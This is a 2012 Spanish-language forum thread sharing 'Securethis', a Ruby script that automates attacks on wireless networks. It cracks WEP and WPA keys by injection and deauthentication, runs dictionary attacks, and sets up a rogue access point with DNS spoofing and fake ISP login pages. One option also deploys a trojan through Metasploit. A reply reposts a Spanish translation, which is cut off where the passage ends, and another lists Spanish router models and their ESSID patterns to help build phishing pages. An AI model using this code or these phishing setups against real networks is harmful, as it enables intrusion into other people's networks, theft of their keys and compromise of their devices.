Online

  • Punto Visitantes: 180
  • Punto Oculto(s): 0
  • Punto Usuarios: 0

No hay usuarios en linea.

Board Stats

  • stats Total de Usuarios: 23538
  • stats Total de Mensajes: 108931
  • stats Total de Temas: 10524
  • stats Total de Categorías: 15
  • stats Total de Foros: 74
  • stats Máx. usuarios conectados (simultáneamente): 1021

Ultimo registro



Autor Tema: Securethis V1.0  (Leído 69381 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Securethis V1.0
« en: Enero 15, 2012, 01:50:08 am »
Hola amigos  8)


He codigo un pequeno script en ruby que puede crackar red WEP/WPA sin entrar un monton de instruction en el terminal.Si tomas la primera option, no hay que poner la carta wifi en modo monitor pero para las otras opcionnes hay que poner.Mas de el codigo ya podeis recuperar paginas falsas de red y un wirelesskeyview.Las paginas estan para los red frances porque le he codigo en primero para crack-wifi pero puedes facilemente cambiar el codigo PHP de esas paginas.

Las paginas se toman aqui
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Hay que poner bien todo en el mismo situo (/var/www)

Y para terminar el codigo:    (option 1: instalation apache, wireshark, dhcp3
                                                   2 wep con injecion
                                                   3 wep con -p0841
                                                   4 rogue AP y falsas paginas
                                                   5 rogue AP y wireless key view
                                                   6 caja de outila

Necessita para andar:
rubygems1.8
rubygems1.9.1
libgtk2-ruby1.8

Se pone en root et se lanca asi:

Código: [Seleccionar]
ruby Securethis.rb
Código: [Seleccionar]
#!/usr/bin/env ruby

 def menu
  puts "##################    Coded By Flow (Koala)            #######"
  puts "##################                                     #######"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~~~~~~~~~~~~~~~~ 0 -Installation des elements           ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de cle wep avec injection     ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de cle wep avec -p0841        ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de cle wpa avec dico          ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 4 -Crack wpa avec rogue AP et fakepage ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 5 -Crack wpa avec rogue AP et WKV      ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 6 -Boite a outils                      ~~~~"
end
menu
opt=""
      while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")
      puts "Choissisez votre options (entre 0 et 6)"
      opt=gets.chomp
end

      if(opt=="0")
      puts "L'installation des elements utiles a la rogue va commencer, merci de patienter et de ne pas interrompre le processus, restez vigilent il se peut qu'on vous demande une confirmation pour l'installation des nouveaux paquets, si c'est le cas tapez Y pour Yes ou O pour Oui"
      sleep 10
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
end
menu

      if(opt=="1")
      puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper"
      sleep 5
`airmon-ng start wlan0`
system ("ifconfig")
      puts "Rentrez l'adresse mac de votre carte wifi"
mac=""
mac=gets.chomp
$mac=mac

      puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
      sleep 5
      system ("airodump-ng --encrypt wep mon0")
      puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

      puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nom}-01.cap &> /dev/null &")
end

     if(opt=="2")
     puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper"
sleep 5
system ("ifconfig")
     puts "Rentrez l'adresse mac de votre carte wifi"
mac=""
mac=gets.chomp
$mac=mac

     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end


     if(opt=="3")
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 18
rep=""
     while rep!="oui" && rep!="non"
     puts "Le hanshake est-il capture? oui/non"
rep=gets.chomp
     if rep=="oui"
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")

     elsif rep=="non"
     puts "Lancement de mdk3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")
sleep 40
     puts "Maintenant entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
else
     puts "Choisissez une reponse valide"
      end
   end
end


     if(opt=="4")
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
sleep 5
down=""
     while down!="oui" && down!="non"
puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")

     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
puts "Revenir au menu?"
rp=gets.chomp
else
     puts "Choisissez une reponse valide"
     end
  end
end


     if(opt=="5")
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch}-e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Mise en place du trojan"
sleep 3
`cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`
Dir.chdir '/root/metasploit'
`cd /root/metasploit`
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")
sleep 5
down=""
     while down!="oui" && down!="non"
puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
else
puts "Choisissez une reponse valide"
    end
  end
end


     if(opt=="6")
puts "1 -Editer les fichiers essentiels au crack"
puts "2 -Editer les fichiers log de apache"
puts "3 -Faire une rogue AP transparente pour permettre a la victime de naviguer sur le net"
puts "4 -Lister les fichiers et leurs droits respectif dans /var/www"
choix=""
     while choix!="1" && choix!="2" && choix!="3"
choix=gets.chomp

     if choix=="1"
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`

     elsif choix=="2"
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`

     elsif choix=="3"
     puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
`iptables --append FORWARD --in-interface at0 -j ACCEPT`
`iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
puts "La victime peut surfer sur internet maintenant, soyez pas trop mechant :)"
sleep 5

     elsif choix=="4"
     puts "Les fichiers present sont:"
sleep 3
system ("ls -l /var/www")
    end
  end
end
system ("ruby Securethis.rb")


Si teneis preguntas no hay problemo.


Hasta la proxima  :)
« Última modificación: Enero 15, 2012, 02:01:36 am por koala63 »

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #1 en: Enero 15, 2012, 03:20:03 am »
!Gracias por el aporte Koala!  ;)
Aquí os dejo un link para tener instalado ruby en Windows
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.

Desconectado maripuri

  • Master
  • Usuario
  • ******
  • Mensajes: 23325
  • Mari
    • WirelessWindows
Re:Securethis V1.0
« Respuesta #2 en: Enero 15, 2012, 08:25:04 am »
koala63

Un bonito trabajo, gracias.
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
 
Sorry, you are not allowed to see this part of the text. Por favor ingresa o regístrate.
No preguntes sobre temas del foro por privado, participa en el.

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #3 en: Enero 15, 2012, 20:05:05 pm »
De nada, a ver, si teneis paginas de administration de red espanol a dar me veré lo que se puede hacer con las falsas paginas.

Desconectado haroll

  • Usuario
  • *
  • Mensajes: 151
Re:Securethis V1.0
« Respuesta #4 en: Mayo 29, 2012, 12:48:08 pm »
Te borraron el link...Este tema esta un poco parado...Voy a intentar ponerm con mi tarjeta y back track 5 aver si consigo hacer el rouge AP y tengo q falsear las dns no cierto!?

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #5 en: Mayo 29, 2012, 15:47:53 pm »
El script se encarga de ello me parece (si he bien entendido lo que quieres decir)
Gracias por reportar los links rotos, lo haré saber a koala  - de paso dejaré el script traducido al español cuando tendré un rato.  ;)


Desconectado haroll

  • Usuario
  • *
  • Mensajes: 151
Re:Securethis V1.0
« Respuesta #6 en: Mayo 29, 2012, 17:07:59 pm »
HOla,una prenguntilla no se si va aki...Despues de hacer Rogue AP y un cliente de la "otra red" en mi "AP" tengo q crear un pagina fake...alguien me podria hechar una mano.

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #7 en: Agosto 02, 2012, 10:56:49 am »
Hola :)


Si teneis ejemplo de paginas red en espana, haré falsas como asi el proyecto estara completo  :)

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #8 en: Agosto 02, 2012, 14:33:36 pm »
¡Que buena sorpresa tener tu visita!  ;D
¿ Te mandemos el codigo fuente de las paginas ? ¿O como prefieres que procedamos?
Te voy a mandar unas cuentas, pongo aquí los modelos para que no mandamos los mismas en triple.

modelo:  Xavi       -  Solos 4610 RD / Solos 461x CSP v1.0   -

 ISP  : OnO              2 essid: ONOXXXX (WPA) y ONO YYYY (WEP) con X+Y = 9
bssid    E0:91xxxxxxxx

----------------------------------------------------------------------------------------------------------------



OBSERVA TELECOM, AW4062,
bssid          00:19:15:xx:xx:xx (unicamente)
essid          WLAN_XXXX   "X" dónde X es alfanumerico



------------------------------------------------------------------------------------------------------------


NETGEAR "residential gateway" CG3100D-RG
bbsid          type 20:4e:xx entre otras
essid          ONO_XXXX    X son alafanumericos




------------------------------------------------------------------------------------------------------------


HUWAI "Echo life" HG532c 
essid           FTE-XXXX      X alfanumerico   
bssid            84:A8:xx:xx:xx (entre otras)


------------------------------------------------------------------------------------------------------------

« Última modificación: Agosto 03, 2012, 17:16:06 pm por kcdtv »

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #9 en: Agosto 04, 2012, 09:09:24 am »
AQUI EL SCRIPT TRADUCIDO AL ESPAÑOL


Código: [Seleccionar]
#!/usr/bin/env ruby

 def menu
  puts "##################    Coded By Flow (Koala)            #######"
  puts "##################                                     #######"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~~~~~~~~~~~~~~~~ 0 -Instalación de los elementos          ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de llave WEP mediante inyección    ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de llave WEP mediante -p0841       ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de llavee WPA con diccionario         ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 4 -Crack WPA con rogue AP y pagina fake    ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 5 -Crack WPA con rogue AP y WKV      ~~~~"
  puts "~~~~~~~~~~~~~~~~~~ 6 -Caja de herramienta         ~~~~"
end
menu
opt=""
      while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")
      puts "Opción elegida (entre 0 y 6)"
      opt=gets.chomp
end

      if(opt=="0")
      puts "Se esta iniciando la instalación de los elementos necesarios al Rogue. Gracias por esperar y no interrumpir el proceso. Se le pedirá probablemente confirmación para instalar los nuevos paquetes. Si es así entrar «Y» para «Yes» y «S» para «si»."
      sleep 10
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
end
menu

      if(opt=="1")
      puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
      sleep 5
`airmon-ng start wlan0`
system ("ifconfig")
      puts "Entrar dirección MAC de su dispositivo wireless"
mac=""
mac=gets.chomp
$mac=mac

      puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
      sleep 5
      system ("airodump-ng --encrypt wep mon0")
      puts "Nombrar el fichero de captura"
nombre=""
nombre=gets.chomp
$nombre=nombre

      puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar el numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nombre}-01.cap &> /dev/null &")
end

     if(opt=="2")
     puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
sleep 5
system ("ifconfig")
     puts "Entrar la dirección MAC de su dispositivo wireless"
mac=""
mac=gets.chomp
$mac=mac

     puts "Responder a las preguntas del programa, tener cuidado en no equivocarse"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Nombrar el fichero de captura"
nombre=""
nombre=gets.chomp
$nombre=nombre

     puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar el numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nombre}-01.cap &> /dev/null &")
end


     if(opt=="3")
     puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Nombrar el fichero de captura"
nombre=""
nombre=gets.chomp
$nombre=nombre

     puts "Entrar nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Entrar la dirección MAC del cliente conectado a la red (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nombre} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 18
rep=""
     while rep!="si" && rep!="no"
     puts "¿El handshake ha sido recuperado? si/no"
rep=gets.chomp
     if rep=="si"
puts "Entrar el nombre del diccionario a utilizar"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")

     elsif rep=="no"
     puts "Iniciando mdk3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")
sleep 40
     puts "Ahora escribir el nombre del diccionario a emplear"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nombre}.cap &> /dev/null &")
else
     puts "Elegir una respuesta valida"
      end
   end
end


     if(opt=="4")
     puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar bel numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Reglas iptables establecidas, reiniciando dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Puesta en funcionamiento de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "Iniciando wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
sleep 5
down=""
     while down!="si" && down!="no"
puts "Para el ataque tipo downgrade de la red objectivo; usar mdk3 o airebase? El resultado es el mismo pero mdk3 va intentar desconectar el cliente de la red mientras que airebase va crear una red idéntica a la red objectivo  para impedir que se conecte correctamente al AP legitimo. Una cruz roja debería ser visible dónde ve normalmente el icono de su gestor de redes. Solo puede usar una herramienta a la vez. ¿Cual elige?  mdk3/airbase"
down=gets.chomp

     if down=="mdk3"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")

     elsif down=="airbase"
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
puts "¿Volver al menú?"
rp=gets.chomp
else
     puts "Eligir una respuesta valida"
     end
  end
end


     if(opt=="5")
     puts "Efectuando escaneo de redes. Una vez elegido el objectivo prensar Ctrl+c para seguir adelante"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Entrar el nombre de la red (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Entrar el numero del canal de la red (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Entrar la dirección MAC de la red (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creación de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch}-e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Reglas iptables establecidas, reiniciando dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Puesta en funcionamiento de apache y dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
